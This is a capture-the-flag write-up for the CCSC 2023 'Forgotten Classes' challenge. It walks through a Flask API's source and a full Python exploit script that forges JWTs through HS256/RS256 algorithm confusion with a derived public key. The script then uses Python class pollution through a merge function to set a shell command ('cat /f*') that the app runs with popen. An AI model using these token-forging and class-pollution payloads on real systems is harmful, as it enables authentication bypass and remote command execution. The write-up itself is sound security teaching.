CCSC 2023 Forgotten Classes

16/07/2023 - 5 minutes

2023 ccsc class_pollution ctf ctfs flask hacking inheritance jwt python web

Description

This is an old API for a classroom application that is no longer used due to the AI takeover. Inside information states the API is still available and is connected to the AI's internal infrastructure. Can you hack it and read any hidden secrets on the root / path of the server?

Author: sAINT_barber

Enumeration

Let's download the provided zip with the source code and crunch through it in VS Code. First, to get the gist of what this application does, let's view the Dockerfile and get the challenge set up for some local testing.

Dockerfile

FROM python:3.9

WORKDIR /app

COPY flag.txt /flag-probably-some-random-string-here.txt

COPY requirements.txt .

RUN pip install -r requirements.txt

COPY middleware/ middleware
COPY pyjwt/ pyjwt
COPY routes/ routes
COPY app.py app.py
COPY database.py database.py
COPY models.py models.py
COPY utils.py utils.py

RUN pip install -e pyjwt

EXPOSE 3000

CMD ["python", "app.py"]

Two things stick out immediately:

  1. The flag is copied to a file with a random suffix (flag-randomChars.txt). That usually means the challenge wants us to gain some kind of RCE to find out that random suffix, and a simple file read just won't cut it.
  2. Everything is installed from requirements.txt except pyjwt, which ships as its own pyjwt directory and is installed separately with pip install -e. This is particularly odd, so I set out to find out why it was done.

Pyjwt

image_2_f6975970.png

These look like the files of a normal pip module installation. Hence, I went to the official pyjwt GitHub to download the latest released pyjwt version and find out how the two differ.

structure.png
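If you would rather script the comparison than eyeball it, the standard library's filecmp module can walk both trees. The following is only a minimal sketch: the function name changed_files and the directory arguments are my own placeholders, not part of the challenge.

```python
import filecmp
from pathlib import Path


def changed_files(left: str, right: str) -> list[str]:
    """Recursively list files that differ or exist on only one side."""
    results: list[str] = []

    def walk(cmp: filecmp.dircmp, prefix: Path) -> None:
        # diff_files: present on both sides but not considered equal.
        for name in cmp.diff_files:
            results.append(f"modified: {(prefix / name).as_posix()}")
        for name in cmp.left_only:
            results.append(f"only in left: {(prefix / name).as_posix()}")
        for name in cmp.right_only:
            results.append(f"only in right: {(prefix / name).as_posix()}")
        # Recurse into directories that exist on both sides.
        for name, sub in cmp.subdirs.items():
            walk(sub, prefix / name)

    walk(filecmp.dircmp(left, right), Path("."))
    return sorted(results)
```

Calling changed_files("pyjwt", "pyjwt-upstream") (both paths hypothetical) returns one line per differing file. Note that dircmp compares os.stat signatures first, so it is a quick triage step rather than a replacement for a real diff.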

Again, one thing stands out among the files that differ: jwt/algorithms.py. Let's compare that file in VS Code.

image_4_f6975970.png

Aha! This seems very interesting

Original

def prepare_key(self, key: str | bytes) -> bytes:
    key_bytes = force_bytes(key)

    if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
        raise InvalidKeyError(
            "The specified key is an asymmetric key or x509 certificate and"
            " should not be used as an HMAC secret."
        )

    return key_bytes

Modified

   def prepare_key(self, key: str | bytes) -> bytes:
	   key_bytes = force_bytes(key)

	   # This kept on breaking my code - I IS DEVELOPEEERRR - also send me a message if you find this section, im curious to know why you're here :D ~ sAINT_barber

	   # if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
	   #     raise InvalidKeyError(
	   #         "The specified key is an asymmetric key or x509 certificate and"
	   #         " should not be used as an HMAC secret."
	   #     )

	   return key_bytes

We can see that the pyjwt library has been modified to allow public keys to be used as an HMAC secret for JWT algorithms such as HS256. Let's keep this in mind and continue reading through the application.

app.py

from flask import Flask
from routes.routes import bp
from database import db
import secrets

app = Flask(__name__)
app.config['JWT_SECRET_KEY'] = secret_key = secrets.token_hex(32)

app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///classroom.db'

app.register_blueprint(bp)

db.initialize_database()
db.disconnect()

if __name__ == '__main__':
   from waitress import serve
   serve(app, host="0.0.0.0", port=3000)

Nothing really out of the ordinary here, so let's look at the routes.

routes/routes.py

from flask import Blueprint, request, jsonify
from database import hash_password, db
from models import Admin, Student, Teacher, Janitor, ComputerRoom
from middleware.authorization import create_access_token, verify, admin_required, public_key_pem
from utils import merge

bp = Blueprint('bp',__name__)

@bp.before_request
def validate_content_type():
   if request.method != 'GET' and not request.is_json:
	   return jsonify({'error': 'Invalid Content-Type. Only JSON requests are accepted.'}), 400


@bp.route('/', methods=['GET'])
@verify
def home(user):
   msg = f"""Hello {user.username}! Here is your card info:
   ID: {user.id}
   Role: {user.role}
   """
   return msg, 200


@bp.route('/login', methods=['POST'])
def login():

   data = request.json
   username = data.get('username')
   password = hash_password(data.get('password'))

   row = db.login({
	   "username":username,
	   "password":password
   })
   if row:
	   id, username, role = row
	   payload = {
		   'id': id,
		   'username': username,
		   'role': role
	   }

	   access_token = create_access_token(payload, algorithm='RS256')
	   return jsonify({'access_token': access_token}), 200
   else:
	   return jsonify({'error': 'Wrong username/password'}), 401


@bp.route('/register', methods=['POST'])
def register():

   data = request.json
   username = data.get('username')
   password = hash_password(data.get('password'))

   data = {
	   "username":username,
	   "password":password,
	   "role": "student"
   }

   if db.user_exists(data):
	   return jsonify({'message': 'User exists.'}), 401

   db.insert_user(data)

   return jsonify({'message': 'User registered successfully.'}), 201


@bp.route('/update', methods=['POST'])
@verify
def update(user):
   update_info = request.json
   merge(update_info, user)
   return jsonify({'message': "User updated successfully", 'user': user.__dict__}), 200

@bp.route('/admin', methods=['GET'])
@verify
@admin_required
def admin(user):
   room = ComputerRoom()
   msg = f"""Welcome {user.username}, here are the stats:
   {room.get_max(40)}
   {room.last_login()}
   """
   return msg, 200

Let's break the above down, starting with the middleware behind the verify and admin_required decorators:

middleware/authorization.py

from flask import current_app, request, jsonify, g
from functools import wraps
from models import Admin, Student, Teacher, Janitor
import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

app = current_app

private_key = rsa.generate_private_key(
  public_exponent=65537,
  key_size=2048
)

private_key_pem = private_key.private_bytes(
  encoding=serialization.Encoding.PEM,
  format=serialization.PrivateFormat.PKCS8,
  encryption_algorithm=serialization.NoEncryption()
)

public_key_pem = private_key.public_key().public_bytes(
  encoding=serialization.Encoding.PEM,
  format=serialization.PublicFormat.SubjectPublicKeyInfo
)


def verify(f):
  @wraps(f)
  def decorated(*args, **kwargs):
   token = request.headers.get('Authorization')
   print(f"Verifying token: {token}")
   if not token:
	   return jsonify({'message': "Token is missing"}), 401

   token = token.split(" ")[1]
   try:
	   alg = jwt.get_unverified_header(token)['alg']
	   if alg in ['HS256', 'RS256']:

		   token = jwt.decode(token, public_key_pem, algorithms=[alg])
		   role  = token.get('role', 'student')

		   if role == "admin":
			   user = Admin(token.get('id'), token.get('username'))
		   elif role == "student":
			   user = Student(token.get('id'), token.get('username'))
		   elif role == "teacher":
			   user = Teacher(token.get('id'), token.get('username'))
		   elif role == "janitor":
			   user = Janitor(token.get('id'), token.get('username'))
		   else:
			   user = Student(token.get('id'), token.get('username'))

		   g.user = user
	   else:
		   return jsonify({'message': "Invalid algorithm"}), 500

   except jwt.ExpiredSignatureError:
	   return jsonify({'message': "Token has expired"}), 401
   except jwt.InvalidTokenError:
	   return jsonify({'message': "Invalid token"}), 401
   except Exception:
	   return jsonify({'message': "You broke me :("}), 500

   return f(user, *args, **kwargs)
  return decorated

def create_access_token(payload, algorithm='HS256'):
  if algorithm == 'HS256':
   signing_key = public_key_pem
  elif algorithm == 'RS256':
   signing_key = private_key_pem.decode()
  else:
   raise ValueError(f'Invalid algorithm: {algorithm}')

  open('public.pem', 'wb').write(public_key_pem)
  token = jwt.encode(payload, signing_key, algorithm=algorithm)

  return token

def admin_required(f):
  @wraps(f)
  def decorated(*args, **kwargs):
   user = getattr(g, 'user', None)
   if user and user.role == 'admin':
	   return f(*args, **kwargs)
   else:
	   return jsonify({'message': "Access denied. User is not an admin", 'user': user.__dict__}), 403

  return decorated

The verify function accepts two JWT algorithms, ['HS256', 'RS256'], and takes the algorithm from the token's own unverified header, which is a very peculiar thing to support. In addition, the same public_key_pem is passed to jwt.decode in both cases: it is the public key for RS256 and the HMAC secret for HS256. This is very odd, because public keys are considered public information and are usually easy to retrieve, so they are not kept secret and should not double as HMAC secrets. Combined with the patched pyjwt, anyone who obtains the public key can sign their own HS256 tokens.
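To make the confusion concrete, here is a minimal sketch of HS256 signing and verification using only the standard library, with the PEM bytes as the HMAC secret. The helper names (b64url, forge_hs256, verify_hs256) and the placeholder PEM are my own assumptions for illustration; the real server goes through the patched pyjwt instead.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def forge_hs256(claims: dict, secret: bytes) -> str:
    """Build a JWT whose signature is HMAC-SHA256(secret, header.payload)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def verify_hs256(token: str, secret: bytes) -> dict:
    """Roughly what a server does once it trusts alg=HS256 from the header."""
    signing_input, _, sig = token.rpartition(".")
    expected = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig):
        raise ValueError("bad signature")
    payload_b64 = signing_input.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


# Placeholder bytes standing in for the server's real public key (assumption).
PUBLIC_PEM = b"-----BEGIN PUBLIC KEY-----\nplaceholder\n-----END PUBLIC KEY-----\n"

token = forge_hs256({"id": 3, "username": "x", "role": "janitor"}, PUBLIC_PEM)
print(verify_hs256(token, PUBLIC_PEM)["role"])  # prints "janitor"
```

Because HMAC is symmetric, whoever holds the "secret" can both verify and sign. The secret has to match the server's PEM byte for byte, including line breaks and the trailing newline, otherwise the signature check fails.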

models.py

from os import popen

class User:
   def __init__(self, id, username, role) -> None:
	   self.id = id
	   self.username = username
	   self.role = role

class Admin(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'admin')

class Teacher(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'teacher')

class Student(User):
   def __init__(self, id, username):
	   super().__init__(id, username, 'student')

class Classroom:
   def get_max(self, students):
	   return f"Max students: {students}\n"

class ComputerRoom(Classroom):
   def last_login(self):
	   command = self.cmd if hasattr(self, 'cmd') else 'date'
	   return f'Last login: {popen(command).read().strip()}'

class TechnologyRoom(Classroom):
   def get_items(self):
	   return "There are 100 soldering irons left"

class Janitor(TechnologyRoom):
   def __init__(self, id, username) -> None:
	   self.id = id
	   self.username = username
	   self.role = "janitor"

We can observe that the ComputerRoom class (which is only ever instantiated in /admin) has a last_login function that passes self.cmd to popen, falling back to date when cmd is not set, and displays the output as the last login time. This is very important, as it is probably our RCE entry point. Let's note down that we somehow need ComputerRoom.cmd to be set to a command that reads the flag.
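The reason this matters is Python's attribute lookup: hasattr(self, 'cmd') also finds attributes defined on the class or on any parent class. A small sketch with stripped-down stand-ins for the challenge classes (popen is deliberately left out, and the command method is my own name):

```python
class Classroom:
    pass


class ComputerRoom(Classroom):
    def command(self) -> str:
        # Same fallback logic as last_login(), minus the popen() call.
        return self.cmd if hasattr(self, "cmd") else "date"


room = ComputerRoom()
before = room.command()

# An attribute set on the parent class is visible on every instance of
# every subclass, including instances that already exist.
Classroom.cmd = "cat /f*"
after = ComputerRoom().command()

print(before, "->", after)  # prints "date -> cat /f*"
```

So we never need a handle on the ComputerRoom instance created inside /admin. Setting cmd anywhere up its inheritance chain is enough.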

utils.py

def merge(src, dst):
   for k, v in src.items():
	   if k == "__init__": # No init for you! :(
		   break
	   if hasattr(dst, '__getitem__'):
		   if dst.get(k) and type(v) == dict:
			   merge(v, dst.get(k))
		   else:
			   dst[k] = v
	   elif hasattr(dst, k) and type(v) == dict:
		   merge(v, getattr(dst, k))
	   else:
		   setattr(dst, k, v)

OK, so: merge functions are usually the main cause of prototype pollution in JavaScript and of its Python counterpart, class pollution. Reading through the known payloads, our most powerful weapon with such a vulnerability is taking control of Python's globals through a class's __init__ constructor (or overwriting the constructor itself), which gives us complete control over the application. But did you think it would be this easy? Hahaha, think again! Every payload that does such things goes through __init__, which the function above blocks.
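To see what the filter takes away, here is a sketch that runs the classic __init__.__globals__ payload against the challenge's merge with and without the check. The block_init flag, the SECRET global and the cut-down User class are my own additions for the comparison.

```python
def merge(src, dst, block_init=True):
    """The challenge's merge; block_init=False removes the __init__ filter."""
    for k, v in src.items():
        if block_init and k == "__init__":
            break
        if hasattr(dst, "__getitem__"):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k), block_init)
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k), block_init)
        else:
            setattr(dst, k, v)


SECRET = "original"  # hypothetical global an attacker would like to overwrite


class User:
    def __init__(self, username):
        self.username = username


payload = {"__class__": {"__init__": {"__globals__": {"SECRET": "pwned"}}}}

merge(payload, User("a"))                    # filtered: loop breaks at __init__
filtered_result = SECRET
merge(payload, User("a"), block_init=False)  # unfiltered: reaches module globals
unfiltered_result = SECRET

print(filtered_result, unfiltered_result)  # prints "original pwned"
```

Note that the filter uses break rather than continue, so any keys that follow __init__ in the same dictionary are silently dropped as well.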

The only part we can still use to our advantage is the "Creating class property default value to RCE (subprocess)" gadget from the Gadget examples on the HackTricks page. It essentially allows us to use __base__ to climb the Python inheritance tree and pivot from child to parent classes, where a newly set class attribute becomes the default for every subclass.
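Here is a minimal local reproduction of that gadget against the challenge's merge. The classes are cut-down copies of models.py, and popen is replaced by a plain return so the sketch has no side effects.

```python
def merge(src, dst):
    """Copy of the challenge's utils.merge."""
    for k, v in src.items():
        if k == "__init__":
            break
        if hasattr(dst, "__getitem__"):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


class Classroom:
    pass


class ComputerRoom(Classroom):
    def last_login(self):
        # The real method passes this string to popen().
        return self.cmd if hasattr(self, "cmd") else "date"


class TechnologyRoom(Classroom):
    pass


class Janitor(TechnologyRoom):
    def __init__(self, id, username):
        self.id = id
        self.username = username
        self.role = "janitor"


janitor = Janitor(3, "x")
# instance -> Janitor -> TechnologyRoom -> Classroom, then set cmd there.
merge({"__class__": {"__base__": {"__base__": {"cmd": "cat /f*"}}}}, janitor)

print(ComputerRoom().last_login())  # prints "cat /f*"
```

The payload never touches __init__, so the filter does not fire, and the attribute ends up on Classroom itself rather than on the janitor object.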

Exploitation

Now that we have a very good enumeration done on the application, let's try to piece together exploit paths/plans!

Revisiting the classes in models.py and possibilities for RCE

inheritance.png

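As my very beautiful diagram shows, our only way to use the gadget discovered above to set ComputerRoom.cmd is to climb all the way from the Janitor class to Classroom (Janitor -> TechnologyRoom -> Classroom). User and its subclasses (Admin, Teacher, Student) do not inherit from Classroom, so they cannot reach it through __base__.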

Hence, assuming we somehow become a janitor and then an admin, we can set cmd to a command that reads the flag file, then visit /admin and see the much-wanted flag in place of the last login date.

Exploitation plan

  1. Authenticate as a janitor and use /update to set cmd on Classroom with {"__class__":{"__base__": {"__base__": {"cmd": "cat /f*"}}}}
  2. Authenticate as an admin and view the flag on /admin

The question then becomes: how do we become a janitor or an admin when we can only register as students?

Forging a token

Creating our own token with any values we want becomes very easy if we manage to leak the public key, since it is used as the HMAC secret for signing and verifying HS256 tokens.

But then how do we get the public key if it is never directly provided to us? Googling around, we can find PortSwigger's wonderful page on algorithm confusion attacks, and in it the section "Deriving public keys from existing tokens", which is exactly what we are looking for! Apparently there is a tool (https://github.com/silentsignal/rsa_sign2n) which does some RSA maths (it determines the RSA modulus common to two signed tokens using gcd), derives the possible public keys and gives them to us as PEM files, exactly what we need.
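The maths behind that derivation fits in a few lines. For an RSA signature s over an encoded message m we have s^e ≡ m (mod n), so n divides s^e - m, and the gcd of two such values is a small multiple of n. Below is a toy sketch of the idea only, not the tool's actual code: the key is tiny, e is 17 to keep the numbers small, and encode() is a simplified stand-in for the PKCS#1 v1.5 padding that real RS256 uses.

```python
import hashlib
import math

# Toy RSA key built from two Mersenne primes (far too small for real use).
P, Q, E = 2**31 - 1, 2**61 - 1, 17
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent


def encode(message: bytes) -> int:
    """Simplified stand-in for PKCS#1 v1.5: hash the message to an int < N."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def sign(message: bytes) -> int:
    return pow(encode(message), D, N)


def recover_modulus(messages, signatures, e=E, small_bound=1000):
    """Return a multiple of the modulus with small stray factors stripped."""
    g = 0
    for m, s in zip(messages, signatures):
        # n divides every s^e - m, hence it divides their gcd too.
        g = math.gcd(g, s**e - encode(m))
    if g == 0:
        raise ValueError("need at least one non-trivial signature")
    for f in range(2, small_bound):
        while g % f == 0:
            g //= f
    return g


msgs = [b"header1.payload1", b"header2.payload2"]
sigs = [sign(m) for m in msgs]
candidate = recover_modulus(msgs, sigs)
print(candidate % N == 0)  # prints "True"
```

With two signatures the candidate is usually the modulus itself, and a third token can be used to confirm it. Once n and e are known, the public key can be serialized to PEM, which is the part the tool automates.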

Thus, I combined all of the above into a beautiful exploit script, automated except for the public key derivation part.

Exploit script

import httpx
import jwt

url = "http://challenges.cybermouflons.com:10070"
# url = "http://172.17.0.2:3000"

def create_access_token(payload, algorithm='HS256', key=None):
	token = jwt.encode(payload, key, algorithm=algorithm)
	return token

def register(username, password):
	r = httpx.post(f"{url}/register", json={"username": username, "password": password}, headers={"Content-Type": "application/json"})
	return r

def login(username, password):
	r = httpx.post(f"{url}/login", json={"username": username, "password": password}, headers={"Content-Type": "application/json"})
	return r, r.json()["access_token"]

def update(token, payload):
	r = httpx.post(f"{url}/update", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"}, json=payload)
	return r

def info(token):
	r = httpx.get(f"{url}", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"})
	return r, r.text

def admin(token):
	r = httpx.get(f"{url}/admin", headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"})
	return r, r.text

r = register("evangelospro1", "1234")
# print(r.text)
r, token1 = login("evangelospro1", "1234")
r = register("evangelospro2", "1234")
# print(r.text)
r, token2 = login("evangelospro2", "1234")

print(f"TOKEN1: {token1}")
print(f"TOKEN2: {token2}")

input("find the public key using https://github.com/silentsignal/rsa_sign2n press enter to continue")

public_key_pem = open("public.pem", "rb").read()
print(public_key_pem)

# Craft a janitor token with the PEM public key as the HS256 secret.
# Stock PyJWT refuses PEM keys as HMAC secrets, so run this against the challenge's patched pyjwt.
payload = {
		   'id': 3,
		   'username': "evangelospro",
		   'role': "janitor"
	   }
janitor_token = create_access_token(payload, algorithm='HS256', key=public_key_pem)
print(f"JANITOR TOKEN: {janitor_token}")
# print(jwt.decode(janitor_token, public_key_pem, algorithms=['HS256']))
res = info(janitor_token)
print(res)

# JANITOR PHASE
update(janitor_token, {"__class__":{"__base__": {"__base__": {"cmd": "cat /f*"}}}})

# ADMIN PHASE
payload = {
		'id': 4,
		'username': "admin",
		'role': "admin"
	}
admin_token = create_access_token(payload, algorithm='HS256', key=public_key_pem)
print(f"ADMIN TOKEN: {admin_token}")
res = admin(admin_token)
print(res)

Results